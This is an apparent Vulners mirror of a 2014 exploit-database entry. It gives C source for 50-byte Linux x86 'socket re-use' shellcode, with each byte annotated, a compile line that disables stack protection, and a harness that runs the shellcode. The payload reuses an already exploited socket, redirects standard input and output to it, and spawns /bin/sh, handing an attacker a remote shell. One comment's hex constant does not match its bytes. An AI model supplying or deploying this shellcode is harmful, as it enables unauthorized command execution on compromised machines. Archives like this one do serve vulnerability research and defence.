Vulners
Lucene search
Linux x86 - Socket Re-use Shellcode 50 bytes
| Reporter | Title | Published | Views | Family All 247 |
|---|---|---|---|---|
 | Linux Kernel PPP-over-L2TP Socket Level Handling - Crash PoC | 5 Mar 201500:00 | – | zdt |
 | Exploit for Improper Privilege Management in Linux Linux_Kernel | 22 Nov 201513:58 | – | githubexploit |
 | CentOS 7 : kernel (CESA-2014:0923) | 26 Jul 201400:00 | – | nessus |
| CentOS 6 : kernel (CESA-2014:0924) | 26 Jul 201400:00 | – | nessus |
| Debian DLA-103-1 : linux-2.6 security update | 26 Mar 201500:00 | – | nessus |
| Debian DSA-2992-1 : linux - security update | 30 Jul 201400:00 | – | nessus |
| EulerOS Virtualization 3.0.1.0 : kernel (EulerOS-SA-2019-1481) | 13 May 201900:00 | – | nessus |
| Fedora 19 : kernel-3.14.13-100.fc19 (2014-8487) | 26 Jul 201400:00 | – | nessus |
| Fedora 20 : kernel-3.15.6-200.fc20 (2014-8519) | 21 Jul 201400:00 | – | nessus |
| Mandriva Linux Security Advisory : kernel (MDVSA-2014:155) | 8 Aug 201400:00 | – | nessus |
10
/* Socket Re-use Combo for linux x86 systems by ZadYree -- 50 bytes
* <[email protected]>
*
* Made using sockfd trick + dup2(0,0), dup2(0,1), dup2(0,2) +
* execve /bin/sh
*
* Thanks: Charles Stevenson, ipv, 3LRVS research team
*
* gcc -o socket_reuse socket_reuse.c -z execstack
*/
char shellcode[]= /* We use sys_dup(2) to get the previous attributed sockfd */
"\x6a\x02" // push 0x2
"\x5b" // pop ebx
"\x6a\x29" // push 0x29
"\x58" // pop eax
"\xcd\x80" // int 0x80 -> call dup(2)
"\x48" // dec eax
/* Now EAX = our Socket File Descriptor */
"\x89\xc6" // mov esi, eax
/* dup2(fd,0); dup2(fd,1); dup2(fd,2); */
"\x31\xc9" // xor %ecx,%ecx
"\x56" // push %esi
"\x5b" // pop %ebx
// loop:
"\x6a\x3f" // push $0x3f
"\x58" // pop %eax
"\xcd\x80" // int $0x80
"\x41" // inc %ecx
"\x80\xf9\x03" // cmp $0x3,%cl
"\x75\xf5" // jne 80483e8 <loop>
/* execve /bin/sh by ipv */
"\x6a\x0b" // push byte 0xb
"\x58" // pop eax
"\x99" // cdq
"\x52" // push edx
"\x31\xf6" // xor esi, esi - We add those instructions
"\x56" // push esi - to clean up the arg stack
"\x68\x2f\x2f\x73\x68" // push dword 0x68732f2f
"\x68\x2f\x62\x69\x6e" // push dword 0x6e69922f
"\x89\xe3" // mov ebx, esp
"\x31\xc9" // xor ecx, ecx
"\xcd\x80"; // int 0x80
;
/*
shellcode[]=
"\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48\x89\xc6"
"\x31\xc9\x56\x5b\x6a\x3f\x58\xcd\x80\x41\x80"
"\xf9\x03\x75\xf5\x6a\x0b\x58\x99\x52\x31\xf6"
"\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
"\x89\xe3\x31\xc9\xcd\x80";
*/
int main(void)
{
printf("Shellcode length: %d\n", strlen(shellcode));
(*(void(*)()) shellcode)();
return 0;
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 Jul 2014 00:00Current
0.1Low risk
Vulners AI Score0.1
CVSS 26.9
EPSS0.01034